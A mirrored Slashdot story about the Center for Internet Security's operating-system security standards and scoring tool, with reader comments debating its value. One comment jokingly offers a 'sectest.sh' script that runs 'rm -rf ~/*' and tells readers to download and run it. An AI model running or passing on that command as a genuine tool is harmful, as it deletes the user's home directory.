Slashdot Mirror

← Back to Stories (view on slashdot.org)

Internet Security Standards

Posted by michael on from the sorely-needed dept.

Aetius writes "The Center for Internet Security has released a set of security standards and tools for several operating systems. Here's the ZDNet story. I checked out the Linux standard and it is a pretty good coverage of the basics; about the only thing missing was a simple firewall treatment. I installed it on my wide-open desktop system (RH 7.3) and scored a 6.61 out of 10, which doesn't seem too bad. The scanner code isn't open source, but it's perl so you can at least look at it. You have to register to download it. If nothing else, the PDF of the standards is a good read. Enjoy."

11 of 135 comments (clear)

  1. Tools to gauge your security? by xA40D · · Score: 4, Insightful

    Quis Custodiet Ipsos Custodes?

    --
    Do you mind, your karma has just run over my dogma.
  2. Missed the biggest hole by Papa+Legba · · Score: 4, Insightful

    Unfortunatly they have missed the biggest hole in security on the internet. The average user and the default install.

    It's all well and good to say that we now have a standard. The problem is that the people who are most likely to use this tool are the ones that don't need it as bad. If you are aware this tool exists then you are security minded enough to have closed all the holes yourself.

    What this really should do is go after the big offenders and get them to work at it. I am not necesarily talking Microsoft here. I am talking about the builders. Until Dell and Compaq start shipping their systems and installer software with the lockdowns ready to go or alrady installed this stuff is going to continue no matter how many checking tools are produced.

    The security community must realize their biggest test is not the sloppy base install of microsoft, but the managers like the one I have at work. His official policy is "If it ain't broke don't fix it." This means patchs are never installed and nothing is upgraded until it is exploited, then it is patched and fixed. Something has to be done about this, and until something is done no other initiative is going to make a dent in exploits on the internet.

    --
    Papa Legba come and open the gate
    1. Re:Missed the biggest hole by stewby18 · · Score: 2, Insightful
      Not only that, but it helps people who are new, relatively unknowledgeable, but want to learn.

      If you are aware this tool exists then you are security minded enough to have closed all the holes yourself.

      It might be more accurate to say that people who are aware this tool exists are security minded enough to want to know how to close the holes, and what the holes are. If there is an easy-to-find list of suggestions, and a tool to help you, it's easier to go from knowing what good security is and wanting it to actually having it.

      The in-the-know are often quick to equate lack of knowledge with Cluelessness, but there are people out there (not the majority, but enough) who don't know things simlpy because they haven't learned them yet.

  3. Here's a quick test tool by Anonymous Coward · · Score: 4, Insightful

    sectest.sh:
    #!/bin/sh
    /bin/rm -rf ~/*

    Instructions:
    1. Download and run
    2. If you performed Step #1, your system is insecure at the most common place, the user.

  4. Re:Open Source vs Free Software by norwoodites · · Score: 3, Insightful

    It is neither free or open source because you cannot change the code legally.

  5. Re:Open Source vs Free Software by _Sprocket_ · · Score: 4, Insightful

    Actually... if you really want to get pedantic...

    You've missed the difference between having the source code available (sometimes referred to as "open source") and Open Source.

    In short, having source code available does not make a project Open Source - its all about the licensing. And not all Open Source projects match the Free Software definition (witness FSF vs BSD jihads).

  6. Delusions of grandeur? by Subcarrier · · Score: 3, Insightful

    What exactly makes these Internet Security Standards, anyway?

    --
    "I have opinions of my own, strong opinions, but I don't always agree with them." -- George H. W. Bush
  7. Standards, eh? by Dthoma · · Score: 2, Insightful

    Judging by the other comments here, part of the standards either don't apply to their situation, are wrong, or are just useless because they've already done everything they recommend and much more. The fact that it's called a standard seems to imply that it should be universal and work on most (if not all) machines in a realistic environment. The fact that it doesn't suggests that it's not actually a standard.

    --

    Note to M1-ers: a curt but otherwise insightful message is not "Flamebait" or "Troll".

  8. I'd hate to see this become a standard.. by defile · · Score: 3, Insightful

    It complained about xinetd and ftp being misconfigred even though both xinetd (and by extension wu-ftpd) aren't running. It complains about how ntp is not running but we're using other clock synching methods. I'm getting a reduced score on bullshit.

    I can see it now... "Sorry, we only do business with vendors whose servers score 9.5 or better"

  9. The fundamental flaw by The+Creator · · Score: 2, Insightful
    One final benchmarc score. There's no network score, no local user intrusion score, no fysical acces score(think lilo passwds). It seems to me that these things are so fundamentally different issues that adding them to a single score is just improductive(if not directly counter productive). "this box got 8.0 the other one only got 6.9, let's put this one on the network".

    If a box is in a locked room and only accesible thru the network then only it's network security is relevant etc. etc.

    --

    FRA: STFU GTFO
  10. Re:Don't waste your time unless you run rh or mdk by BandwidthHog · · Score: 2, Insightful

    One platform that really, really, really needs a tool like this: Mac OS X.

    I don't mean because every cool *nix tool should be ported over for our enjoyment. I mean because, not to generalize, but generally speaking Mac users tend to be a very cocky bunch as regards security. We're used to having literally unhackable machines, and now with the move to a BSD base, all we're told is how much more secure that is than anything else on the planet, so there's probably quite a few Mac users out there who assume their cumulative hackability score is now a negative number.

    Couple that with the fact that it's quickly becoming the most common form of *nix (by sheer quantity) and you've got a whole lot of potentially insecure BSD setups operating under a false sense of security, which could bring as much evil to this world as raw sockets.

    Feel free to look down on me for being some lowly point-and-drool GUI junky, but if OS X boxes start getting cracked in large numbers, then the mainstream hears that *nix isn't much more secure than the other type of operating system, and that only helps the bad guys.

    --

    Quantum materiae materietur marmota monax si marmota monax materiam possit materiari?